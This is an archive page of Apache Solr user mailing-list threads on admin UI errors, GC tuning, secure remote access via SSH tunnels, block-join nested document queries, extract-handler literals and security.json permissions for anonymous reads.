2020-04-02 02:16:34.106 INFO (qtp429353573-17) [ x:my_core] o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = queryResponseWriter,name = velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = {startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}

2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [ x:my_core] o.a.v.loader ResourceManager: unable to find resource 'custom.vm' in any resource loader.

2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [ x:my_core] o.a.s.s.HttpSolrCall null:java.io.IOException: Unable to find resource 'custom.vm'

Best,
Erick

On Apr 2, 2020, at 02:50, TK Solr wrote:

I'm on Solr 8.3.1 running in non-SolrCloud mode. When I tried to reload an existing core from the Admin UI's "Core Admin" by clicking Reload after modifying the core's conf/managed-schema, no error was reported. But the newly added field type is not shown in the core's Analysis section. When I selected Logging from the sidebar, I saw errors like this for every core, not just the core I tried to reload.
null:java.io.IOException: Unable to find resource 'custom.vm'
  at org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
  at org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
  at org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
  at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
  at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
  at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
  at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
  at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)
  at org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandle
Admin UI core loading fails
I'm on Solr 8.3.1 running in non-SolrCloud mode. When I tried to reload an existing core from the Admin UI's "Core Admin" by clicking Reload after modifying the core's conf/managed-schema, no error was reported. But the newly added field type is not shown in the core's Analysis section. When I selected Logging from the sidebar, I saw errors like this for every core, not just the core I tried to reload:

null:java.io.IOException: Unable to find resource 'custom.vm'
  at org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
  at org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
  at org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
  at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
  at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
  at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
  at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
  at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)
  at org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:540)

I could not find any mention of custom.vm in any files under any core's conf directory. I restarted Solr, the core was loaded without an error, and I can see the newly added field type. What could be the cause of these errors, which only happen with the Reload button?

TK
Re: Solr admin interface freezes on Chrome
> Works fine on Firefox, and I > haven't made any changes to our Solr instance (v8.1.1) in a while. I had a co-worker with a similar issue. He had a pop-up blocker enabled in Chrome that was preventing some resource call (or something similar). When he switched to Firefox, everything worked without issue. Any chance something is showing in the developer tools console?
Solr standalone timeouts after upgrading to SOLR 7
Hello all, We recently moved to Solr 7 from Solr 6 about two weeks ago. Once each week (including today) we have experienced query timeout issues with corresponding GC events. There was a spike in CPU up to 66%, which is not something we previously saw with Solr 6. From the Solr logs it looks like something happened inside the JVM; Solr is reporting closed connections from Jetty. Our data size is relatively small, but we do run 5 cores within the one Jetty instance. Their index sizes are anywhere between 200 MB and 2 GB. Our memory consumption is relatively low: "free":"296.1 MB", "total":"569.6 MB", "max":"9.6 GB", "used":"273.5 MB (%2.8)", We had a spike in traffic about 5 minutes prior to some longer GC events (similar situation last week). Any help would be appreciated. Below is my current system info along with a GC log snippet and the corresponding Solr log error. *System info:* AMZ2 linux, 8 core, 32 GB Mem *Java:* 1.8.0_222-ea 25.222-b03 *Solr:* "solr-spec-version":"7.7.2" *Start options:* "-Xms512m", "-Xmx10g", "-XX:NewRatio=3", "-XX:SurvivorRatio=4", "-XX:TargetSurvivorRatio=90", "-XX:MaxTenuringThreshold=8", "-XX:+UseConcMarkSweepGC", "-XX:ConcGCThreads=4", "-XX:ParallelGCThreads=4", "-XX:+CMSScavengeBeforeRemark", "-XX:PretenureSizeThreshold=64m", "-XX:+UseCMSInitiatingOccupancyOnly", "-XX:CMSInitiatingOccupancyFraction=50", "-XX:CMSMaxAbortablePrecleanTime=6000", "-XX:+CMSParallelRemarkEnabled", "-XX:+ParallelRefProcEnabled", "-XX:-OmitStackTraceInFastThrow", "-verbose:gc", "-XX:+PrintHeapAtGC", "-XX:+PrintGCDetails", "-XX:+PrintGCDateStamps", "-XX:+PrintGCTimeStamps", "-XX:+PrintTenuringDistribution", "-XX:+PrintGCApplicationStoppedTime", "-XX:+UseGCLogFileRotation", "-XX:NumberOfGCLogFiles=9", "-XX:GCLogFileSize=20M", "-Xss256k", "-Dsolr.log.muteconsole" Here is an example from the GC log: 2019-10-02T16:03:15.888+: 265318.624: [Full GC (Allocation Failure) 2019-10-02T16:03:15.888+: 265318.624: [CMS2019-10-02T16:03:16.134+: 26 5318.870: [CMS-concurrent-mark: 
1.773/1.783 secs] [Times: user=13.14 sys=0.00, real=1.78 secs] (concurrent mode failure): 7864319K->7864319K(7864320K), 9.5890129 secs] 10048895K->8863021K(10048896K), [Metaspace: 53159K->53159K(1097728K)], 9.5892061 secs] [Times: user=10.31 sys=0.00, real=9.59 secs] Heap after GC invocations=296656 (full 546): par new generation total 2184576K, used 998701K [0x00054000, 0x0005e000, 0x0005e000) eden space 1747712K, 57% used [0x00054000, 0x00057cf4b4f0, 0x0005aaac) from space 436864K, 0% used [0x0005aaac, 0x0005aaac, 0x0005c556) to space 436864K, 0% used [0x0005c556, 0x0005c556, 0x0005e000) concurrent mark-sweep generation total 7864320K, used 7864319K [0x0005e000, 0x0007c000, 0x0007c000) Metaspace used 53159K, capacity 54766K, committed 55148K, reserved 1097728K class spaceused 5589K, capacity 5950K, committed 6000K, reserved 1048576K } 2019-10-02T16:03:25.477+: 265328.214: Total time for which application threads were stopped: 9.5906157 seconds, Stopping threads took: 0.0001274 seconds *With the following from the SOLR log: * [ x:core] o.a.s.s.HttpSolrCall Unable to write response, client closed connection or we are s hutting down org.eclipse.jetty.io.EofException: Closed at org.eclipse.jetty.server.HttpOutput.write(HttpOutput.java:665) ~[jetty-server-9.4.14.v20181114.jar:9.4.14.v20181114] at org.apache.solr.servlet.ServletOutputStreamWrapper.write(ServletOutputStreamWrapper.java:126) ~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c 1fefc589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48] at org.apache.solr.response.QueryResponseWriterUtil$1.write(QueryResponseWriterUtil.java:54) ~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c1fef c589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48] at java.io.OutputStream.write(OutputStream.java:116) ~[?:1.8.0_222-ea] at sun.nio.cs.StreamEncoder.writeBytes(StreamEncoder.java:221) ~[?:1.8.0_222-ea] at sun.nio.cs.StreamEncoder.implWrite(StreamEncoder.java:282) ~[?:1.8.0_222-ea] at sun.nio.cs.StreamEncoder.write(StreamEncoder.java:125) 
~[?:1.8.0_222-ea] at java.io.OutputStreamWriter.write(OutputStreamWriter.jav
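The "concurrent mode failure" in the GC snippet above shows the CMS old generation completely full (7864319K of 7864320K) during a 9.6-second stop-the-world collection, while the JVM was started at -Xms512m and allowed to grow to 10 GB. A common first adjustment (a sketch only, not a verdict on this setup; SOLR_JAVA_MEM and GC_TUNE are the standard solr.in.sh hooks) is to pin the minimum heap to the maximum so the JVM never has to grow the heap mid-spike:

```shell
# Hypothetical solr.in.sh fragment; sizes must be tuned to the box.
SOLR_JAVA_MEM="-Xms10g -Xmx10g"   # pin min = max instead of 512m..10g
```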
How to access the Solr Admin GUI (2)
First I want to thank you for your comments. Second, I'll add some background information. Here Solr is part of a complex information management project, which I developed for a customer and which includes different source databases containing edited/imported/crawled content. This project runs on a Debian root server, which is hosted by an ISP and maintained by the ISP's support team and, a little bit, by me. This setting was required by my customer. Solr searches are created and processed on this server from a PHP MySQL stack, and port 8983 is only available internally. I agree that opening port 8983 to the public is dangerous; I've experienced that. Nevertheless, from time to time I need access to the Solr Admin GUI on that server. My ISP's support team is not familiar with Solr, but willing to help. So I'll forward your comments to them and discuss with them. Thank you again. Walter

Shawn Heisey wrote on 01.01.2019 20:00:13: If you've blocked the Solr port, then you can't access Solr at all, including the admin UI. The UI is accessed through the same port as the rest of Solr. The admin UI is a static set of resources (html, css, javascript, images, etc) that gets downloaded and runs within the browser, accessing the same API that anything else would. When you issue a query with the admin UI, it is your browser that makes the query, not the server. If you set up a reverse proxy that blocks URL paths for the API while allowing URL paths for the admin UI, then the admin UI won't work -- because everything the admin UI displays or does is accomplished by your browser making calls to the API. Thanks, Shawn

Terry Steichen wrote on 01.01.2019 19:39:04: I think a better approach to tunneling would be: ssh -p -L :localhost:8983 use...@myremoteserver.example.com This requires you to set up a different port () rather than use the standard port 22 (on your router and in your sshd config). 
I've been running something like this for about a year and have rarely if ever had it attacked. Prior to changing the port (to ), however, I was under constant hacking attacks; they find port 22 too attractive to ignore. Also, regarding my use of port : if you have the server running on several local machines (as I do), the use of the port may help prevent confusion (as to whether your browser is accessing a local, defaulted to 8983, or a remote Solr server). Note: you might find that the ssh connection will drop out after some inactivity and need to be restarted occasionally. Pretty simple to do: just run the ssh line above again. Note: I also add authorization controls to the Admin UI (and its functions).

Jörn Franke wrote on 01.01.2019 19:11:18: You could configure a reverse proxy to provide one or more means of authentication. However, I agree that the purpose why this is done should be clarified.

Kay Wrobel wrote on 01.01.2019 19:02:10: You can use ssh to tunnel in. ssh -L8983:localhost:8983 use...@myremoteserver.example.com This will only require port 22 to be exposed to the public. Sent from my iPhone

Walter Underwood wrote on 01.01.2019 19:00:31: Yes, exposing the admin UI on the web is very dangerous. Anyone who finds it can delete all your collections. That UI is designed for "back office" use only. wunder Walter Underwood wun...@wunderwood.org http://observer.wunderwood.org/ (my blog)

Gus Heck wrote on 01.01.2019 18:43:02: Why would you want to expose the administration GUI on the web? This is a very hazardous thing to do. Never mind that it normally runs on 8983 and all its functionality relies on the ability to interact with API endpoints hosted on 8983. What are you actually trying to solve?

Jörn Franke wrote on 31.12.2018 23:07:49: Reverse proxy?

"aleksander_goncha...@yahoo.de" wrote on 31.12.2018 23:22:59: Hi Walter, I had a similar case. It was solved with a proxy. We "simply" put Nginx in between. 
Best regards, Alexander

s...@cid.is wrote on 31.12.2018 22:48:55: Hi all, is there a way, or better a solution, to access the Solr Admin GUI from outside the server (via the public web) while the Solr port 8983 is closed by a firewall and only available inside the server via localhost? Thanks in advance Walter Claassen Alexandraweg 32 D 64287 Darmstadt Fon +49-6151-4937961 Fax +49-6151-4937969 c...@cid.is
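The tunneling recipe discussed in this thread, spelled out with explicitly made-up values for the ports the original mails elided (2222 for a relocated sshd, 8984 locally to avoid clashing with a Solr running on the workstation):

```shell
# All values hypothetical; adjust to your own hosts and firewall rules.
ssh -p 2222 -L 8984:localhost:8983 user@myremoteserver.example.com
# While the tunnel is up, browse http://localhost:8984/solr/ locally;
# the remote 8983 stays closed to the public internet.
```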
How to access the Solr Admin GUI
Hi all, is there a way, or better a solution, to access the Solr Admin GUI from outside the server (via the public web) while the Solr port 8983 is closed by a firewall and only available inside the server via localhost? Thanks in advance Walter Claassen Alexandraweg 32 D 64287 Darmstadt Fon +49-6151-4937961 Fax +49-6151-4937969 c...@cid.is
Re: How to retrieve nested documents (parents and their children together) ?
Ah, that's what _root_ is for ! I was wondering. Thank you! On 7/25/18 2:36 PM, Mikhail Khludnev wrote: _root_:parent-id чт, 26 июля 2018, 1:33 TK Solr : The child doc transformer worked great. Thank you. In my experiment, posting 'parent-id' to the update end point only deleted the parent doc. Do I insert a complex join query from id to _version_ and delete all the docs of the matching _version_ ? On 7/24/18 9:27 PM, TK Solr wrote: Thank you. I'll try the child doc transformer. On a related question, if I delete a parent document, will its children be deleted also? Or do I have to have a parent_id field in each child so that the child docs can be deleted? On 7/22/18 10:05 AM, Mikhail Khludnev wrote: Hello, Check [child] https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory or [subquery]. Although, it's worth to put reference to it somewhere in blockjoin qparsers. Documentation patches are welcome. On Sun, Jul 22, 2018 at 10:25 AM TK Solr wrote: https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser talks about {!parent which=} child docs>, which returns parent docs only, and {!child of=} docs>, which returns child docs only. Is there a way to retrieve the matched documents in the original, nested form? Using the sample document, is there way to get: 1 Solr has block join support parentDocument 2 SolrCloud supports it too! rather than just the parent or the child docs?
Re: How to retrieve nested documents (parents and their children together) ?
The child doc transformer worked great. Thank you. In my experiment, posting 'parent-id' to the update end point only deleted the parent doc. Do I insert a complex join query from id to _version_ and delete all the docs of the matching _version_ ? On 7/24/18 9:27 PM, TK Solr wrote: Thank you. I'll try the child doc transformer. On a related question, if I delete a parent document, will its children be deleted also? Or do I have to have a parent_id field in each child so that the child docs can be deleted? On 7/22/18 10:05 AM, Mikhail Khludnev wrote: Hello, Check [child] https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory or [subquery]. Although, it's worth to put reference to it somewhere in blockjoin qparsers. Documentation patches are welcome. On Sun, Jul 22, 2018 at 10:25 AM TK Solr wrote: https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser talks about {!parent which=} , which returns parent docs only, and {!child of=} , which returns child docs only. Is there a way to retrieve the matched documents in the original, nested form? Using the sample document, is there way to get: 1 Solr has block join support parentDocument 2 SolrCloud supports it too! rather than just the parent or the child docs?
Re: How to retrieve nested documents (parents and their children together) ?
Thank you. I'll try the child doc transformer. On a related question, if I delete a parent document, will its children be deleted also? Or do I have to have a parent_id field in each child so that the child docs can be deleted? On 7/22/18 10:05 AM, Mikhail Khludnev wrote: Hello, Check [child] https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory or [subquery]. Although it's worth putting a reference to it somewhere in the blockjoin qparsers docs. Documentation patches are welcome. On Sun, Jul 22, 2018 at 10:25 AM TK Solr wrote: https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser talks about {!parent which=}, which returns parent docs only, and {!child of=}, which returns child docs only. Is there a way to retrieve the matched documents in the original, nested form? Using the sample document, is there a way to get: 1 Solr has block join support parentDocument 2 SolrCloud supports it too! rather than just the parent or the child docs?
How to retrieve nested documents (parents and their children together) ?
https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser talks about {!parent which=}, which returns parent docs only, and {!child of=}, which returns child docs only. Is there a way to retrieve the matched documents in the original, nested form? Using the sample document, is there a way to get: 1 Solr has block join support parentDocument 2 SolrCloud supports it too! rather than just the parent or the child docs?
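What the replies in this thread converge on can be sketched as a single request: select parents with a block-join query, then re-attach each parent's children with the [child] doc transformer in the fl list. The collection name and field names below are hypothetical:

```shell
# POSTing with --data-urlencode keeps curl from mangling the local-params syntax.
curl 'http://localhost:8983/solr/mycoll/select' \
  --data-urlencode 'q={!parent which="content_type:parentDocument"}comments:SolrCloud' \
  --data-urlencode 'fl=id,title,[child parentFilter=content_type:parentDocument limit=10]'
```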
Re: Parent-child query; subqueries on child docs of the same set of fields
Mikhail, Actually, your suggestion worked! I was making a typo on the field name. Thank you very much! TK p.s. I have found a mention of _query_ "magic field" in the Solr Reference Guide On 7/8/18 11:04 AM, TK Solr wrote: Thank you. This is more promising because I see the second clause in parsedquery. But it is hitting zero document. The debug query output looks like this. explain is empty: rawquerystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" v='attrname:country AND attrvalue:USA'}", "querystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" v='attrname:country AND attrvalue:USA'}", "parsedquery":"+AllParentsAware(ToParentBlockJoinQuery (+(+attrname:genre +attrvalue:drama))) +AllParentsAware(ToParentBlockJoinQuery (+(+attrname:country +attrvalue:usa)))", "parsedquery_toString":"+ToParentBlockJoinQuery (+(+attrname:genre +attrvalue:drama)) +ToParentBlockJoinQuery (+(+attrname:country +attrvalue:usa))", "explain":{}, "QParser":"LuceneQParser", "timing":{...} Could you tell me what _query_ does? On 7/4/18 10:25 PM, Mikhail Khludnev wrote: agh... It's my pet peeve. what about q= {!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} ^leading space q=_query_:{!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND _query_:{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} q=+{!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} +{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} Beware of escape encoding. it might require to replace + to %2b. Post debug=query response here. On Tue, Jul 3, 2018 at 9:25 PM TK Solr wrote: Thank you, Mikhail. But this didn't work. The first {!parent which='...' v='...'} alone works. 
But the second {!parent ...} clause is completely ignored. In fact, if I turn on debugQuery, rawquerystring and querystring have the second query but parsedquery and parsedquery_toString only have the first query. BTW, does the v parameter work in place of the query following {!parsername} for any parser? On 7/3/18 12:42 PM, Mikhail Khludnev wrote: q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}
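Mikhail's warning above about escape encoding matters whenever one of these queries is pasted into a raw URL: an unencoded '+' is decoded as a space. A minimal sketch of the substitutions that bite here (for real use, let curl --data-urlencode do the encoding instead):

```shell
# Percent-encode just the characters these block-join queries trip over.
enc() { printf '%s' "$1" | sed -e 's/+/%2B/g' -e 's/ /%20/g' -e 's/"/%22/g'; }
enc '+{!parent which="isParent:true"} +attrname:genre'
# -> %2B{!parent%20which=%22isParent:true%22}%20%2Battrname:genre
```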
Re: Parent-child query; subqueries on child docs of the same set of fields
Thank you. This is more promising because I see the second clause in parsedquery. But it is hitting zero document. The debug query output looks like this. explain is empty: rawquerystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" v='attrname:country AND attrvalue:USA'}", "querystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" v='attrname:country AND attrvalue:USA'}", "parsedquery":"+AllParentsAware(ToParentBlockJoinQuery (+(+attrname:genre +attrvalue:drama))) +AllParentsAware(ToParentBlockJoinQuery (+(+attrname:country +attrvalue:usa)))", "parsedquery_toString":"+ToParentBlockJoinQuery (+(+attrname:genre +attrvalue:drama)) +ToParentBlockJoinQuery (+(+attrname:country +attrvalue:usa))", "explain":{}, "QParser":"LuceneQParser", "timing":{...} Could you tell me what _query_ does? On 7/4/18 10:25 PM, Mikhail Khludnev wrote: agh... It's my pet peeve. what about q= {!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} ^leading space q=_query_:{!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND _query_:{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} q=+{!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} +{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} Beware of escape encoding. it might require to replace + to %2b. Post debug=query response here. On Tue, Jul 3, 2018 at 9:25 PM TK Solr wrote: Thank you, Mikhail. But this didn't work. The first {!parent which='...' v='...'} alone works. But the second {!parent ...} clause is completely ignored. In fact, if I turn on debugQuery, rawquerystring and querystring have the second query but parsedquery and parsedquery_toString only have the first query. 
BTW, does the v parameter work in place of the query following {!parsername} for any parser? On 7/3/18 12:42 PM, Mikhail Khludnev wrote: q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}
Re: Parent-child query; subqueries on child docs of the same set of fields
Thank you, Mikhail. But this didn't work. The first {!parent which='...' v='...'} alone works. But the second {!parent ...} clause is completely ignored. In fact, if I turn on debugQuery, rawquerystring and querystring have the second query but parsedquery and parsedquery_toString only have the first query. BTW, does the v parameter work in place of the query following {!parsername} for any parser? On 7/3/18 12:42 PM, Mikhail Khludnev wrote: q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}
Parent-child query; subqueries on child docs of the same set of fields
I have a document with child documents like: maindoc_121 true child_121_1 genre drama child_121_2 country USA The child documents have the same set of fields. I can write a query that finds a parent having a child with attrname=genre and attrvalue=drama as q={!parent which="isParent:true"} attrname:genre AND attrvalue:drama But if I want to add another condition, that the parent must also have another child with certain values, what do I do? q={!parent which="isParent:true"} attrname:genre AND attrvalue:drama AND attrname:country AND attrvalue:USA would mean a query for parents where a single child must match all of the conditions. I want a parent that has two children, one matched by one sub-query and another matched by another sub-query. TK
Re: Windows monitoring software for Solr recommendation
On 6/5/18 10:31 AM, Christopher Schultz wrote: How about Apache procrun/commons-daemon? https://commons.apache.org/proper/commons-daemon/procrun.html Thank you, I'll take a look. On 6/5/18 1:51 PM, Shawn Heisey wrote: The best bet for an easy service install is probably NSSM. It's got a name that some people hate, but a lot of people use it successfully. https://nssm.cc/ Thank you, I'll take a look at this one too. You mentioned looking at a GC log. Can you provide that entire log for analysis? Thank you for your offer to help. But I don't really think this is a memory-related issue. I visualized the GC log with GCMV and the graph shows Solr was using less than half of the heap space at the peak. This Solr doesn't get much query traffic and no indexing was running. It's really a sudden death of the JVM with no trace. The only concern I have is that the Solr config files are those of Solr 5.x and they just upgraded to Solr 6.6. But I understand Solr 6 supports a Solr 5 compatible mode. Have there been any issues with the compatibility mode? TK
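For reference, registering Solr as a Windows service with NSSM, as suggested above, is a one-liner. The service name and install path here are made up, and -f keeps Solr in the foreground so the service wrapper can supervise the process:

```shell
nssm install Solr66 "C:\solr-6.6.0\bin\solr.cmd" start -f -p 8983
```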
Windows monitoring software for Solr recommendation
My client's Solr 6.6 running on a Windows server is mysteriously crashing without any JVM crash log. No unusual activities are recorded in solr.log, and the GC log does not indicate an OOM situation. It's a simple single-core, single-node deployment (no SolrCloud) with a very light load. No indexing activities were running near the crash time. After exhausting all possibilities (suggestions are welcome), I'd like to recommend installing some monitoring software, but I couldn't find one that works on Windows for Java-based software. (Some I found can monitor only EXEs. Since all Java software shares the same EXE, java.exe, those won't work.) Can anyone recommend some? It doesn't need to be free, but it can't be very expensive since this is a very lightly used Solr system. Perhaps less than $500? TK
Re: Run solr server using Java program
The solr.cmd script starts Solr by running java -jar start.jar; start.jar's MANIFEST file tells the java command that its main class is org.eclipse.jetty.start.Main. So I would think your Java program should be able to start Solr (Jetty, really) by calling org.eclipse.jetty.start.Main.main(argv). But a big question is why you'd like to do that. TK On 4/18/18 7:34 AM, rameshkjes wrote: Hi guys, I am able to run the solr instance, add the core and import the data manually. But I want to do everything with the help of a Java program; I searched a lot but did not find any relevant answer. In order to run the solr server, I execute the following command inside the directory D:\software\solr-7.2.0\solr-7.2.0\bin: solr.cmd -s "C:\Users\lucky\github\myproject\solr-config" After that I go to http://localhost:8983/solr/ and select the core named "demo", then select the dataimport tab and "execute" to import documents. The first thing I tried was to run the solr server using a Java program, which I am unable to do. Could anyone please help with that? I am using Solr 7.2.0 Thanks -- Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html
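For completeness, the equivalent of what solr.cmd runs, as a sketch with hypothetical paths; a Java program could also simply launch this command line with ProcessBuilder instead of invoking Jetty's Main class in-process:

```shell
cd /path/to/solr-7.2.0/server            # start.jar lives under server/
java -Dsolr.solr.home=/path/to/solr-config -jar start.jar
```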
Minimum memory requirement
On my AWS t2.micro instance, which only has 1 GB of memory, I installed Solr (4.7.1 - please don't ask) and tried to run it in the sample directory as java -jar start.jar. It exited shortly after, due to lack of memory. How much memory does Solr require to run with an empty core? TK
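A sketch of what usually rescues a 1 GB instance: cap the heap explicitly so the JVM's defaults don't overshoot what the machine has. The numbers below are starting guesses to tune, not measured requirements for 4.7.1:

```shell
# Run from the example directory of the 4.x layout:
java -Xms128m -Xmx256m -jar start.jar
```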
literal.* use in posting PDF files
I have a schema.xml that defines two required fields, "id" and "libDocumentID". solrconfig.xml is the standard one. Using curl, I tried posting a PDF file like this: curl 'http://localhost:8983/solr/update/extract?literal.id=foodf=foo=true' -F "myfile=@foo.pdf" but I got: [doc=foo.pdf] missing required field: libDocumentID (status 400). Can I specify more than one literal.name=value? Do I have to define literal.libDocumentID in solrconfig.xml? I'm using Solr 5.3.1 (please don't ask...). TK
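To the question itself: yes, the extract handler accepts any number of literal.<field>=<value> pairs, and nothing has to be declared in solrconfig.xml for that. A sketch with a made-up libDocumentID value:

```shell
curl 'http://localhost:8983/solr/update/extract?literal.id=foo&literal.libDocumentID=DOC-42&commit=true' \
  -F "myfile=@foo.pdf"
```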
Bitnami, or other Solr on AWS recommendations?
If I want to deploy Solr on AWS, do people recommend using the prepackaged Bitnami Solr image? Or is it better to install Solr manually on a computer instance? Or are there a better way? TK
Re: Extended characters
I think you can use ASCIIFoldingFilter http://lucene.apache.org/core/6_2_0/analyzers-common/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilter.html by inserting its factory in your schema. http://lucene.apache.org/core/6_2_0/analyzers-common/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilterFactory.html I would suggest making a separate field for this so that exact matches can be boosted. On 10/29/17 10:56 AM, Robert Brown wrote: Hi, I have a text field in my index containing extended characters, which I'd like to match against when searching without the extended characters. e.g. field contains "Ensō" which I want to match when searching for just "enso". My current config for that field (type) is given below: autoGeneratePhraseQueries="true"> synonyms="index_synonyms.txt" ignoreCase="true" expand="true" /> words="lang/stopwords_en.txt" /> words="lang/stopwords_en.txt" /> Kuro
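The field-type definition quoted in the original mail was stripped somewhere in transit. For reference, a minimal sketch of a folded field type (field and type names illustrative; the factory classes are the ones linked above):

```xml
<fieldType name="text_folded" class="solr.TextField" positionIncrementGap="100">
  <analyzer>
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.LowerCaseFilterFactory"/>
    <filter class="solr.ASCIIFoldingFilterFactory"/>
  </analyzer>
</fieldType>
```

Indexing "Ensō" through this chain yields the token "enso", so a search for "enso" matches; keeping the original text in a separate, unfolded field lets exact matches be boosted, as suggested above.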
Re: Work-around for "indexed without position data"
Not sure if it helps beyond the steps to reproduce that I supplied above, but I also see that "Omit Term Frequencies & Positions" is still set on the field according to the LukeRequestHandler: ITS--OF-- On Mon, Jun 5, 2017 at 1:18 PM, Solr User <solr...@gmail.com> wrote: > Sorry for the delay. I was able to reproduce this easily with my setup, > but reproducing this on a Solr example proved challenging. Hopefully the > work that I did to find the situation in which this is produced will help > in resolving the problem. The driving factor for this appears to be how > updates are sent to Solr. When sending batches of updates with commits, > the problem is reproduced. If the commit is held until after all updates > are sent, then no problem is produced. This leads me to believe that this > issue has something to do with overlapping commits or index merges. This > was reproducible regardless of running classic or managed schema and > regardless of running Solr core or SolrCloud. > > There are not many steps to reproduce this, but you will need a way to > send these updates. I have included inline create.sh and create.pl > scripts to generate the data and send the updates. You can index a > lastModified field or something to convince yourself that everything has > been re-indexed. I left that out to keep the steps lean. Also, this test > is using commit statements from the client sending the updates for > simplicity even though it is not a good practice. My normal setup is using > Solrj with commitWithin to allow Solr to manage when the commits take > place, but the same error is produced either way. > > > *STEPS TO REPRODUCE* > >1. Install Solr 5.5.3 and change to that working directory >2. bin/solr -e techproducts >3. bin/solr stop [Why these next 3 steps? These are to start the >index completely new without the 32 example documents as opposed to a >delete query. The documents are not posted after the core is detected the >second time.] >4. 
Re: Anonymous Read?
Thanks! The null role value did the trick. I tried this with the predefined permissions and it worked as well. Thanks again! On Tue, Jun 6, 2017 at 2:08 PM, Oakley, Craig (NIH/NLM/NCBI) [C] < craig.oak...@nih.gov> wrote: > We usually end security.json with the permissions > >{ > "name":"open_select", > "path":"/select/*", > "role":null}, > { > "name":"all-admin", > "collection":null, > "path":"/*", > "role":"allgen"}, > { > "name":"all-core-handlers", > "path":"/*", > "role":"allgen"}] > } } > > > ...and then assign the "allgen" role to all users > > This allows a select without a login & password, but requires a login & > password for anything else (including the front page of the GUI) > > -Original Message- > From: Solr User [mailto:solr...@gmail.com] > Sent: Tuesday, June 06, 2017 2:27 PM > To: solr-user@lucene.apache.org > Subject: Anonymous Read? > > Is it possible to setup Solr security to allow anonymous query (/select > etc.) but restricted access to other permissions as described in > https://lucidworks.com/2015/08/17/securing-solr-basic- > auth-permission-rules/ > ? >
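Putting the fragments above together, a complete security.json along these lines might look like the sketch below. This is an illustrative assumption, not the exact file from the thread: the user name, role assignment, and credential hash/salt are placeholders, and blockUnknown is left false so that unauthenticated requests can still match the null-role /select rule.

```json
{
  "authentication": {
    "class": "solr.BasicAuthPlugin",
    "blockUnknown": false,
    "credentials": {
      "admin": "<base64 sha256 hash> <base64 salt>"
    }
  },
  "authorization": {
    "class": "solr.RuleBasedAuthorizationPlugin",
    "permissions": [
      { "name": "open_select", "path": "/select/*", "role": null },
      { "name": "all-admin", "collection": null, "path": "/*", "role": "allgen" },
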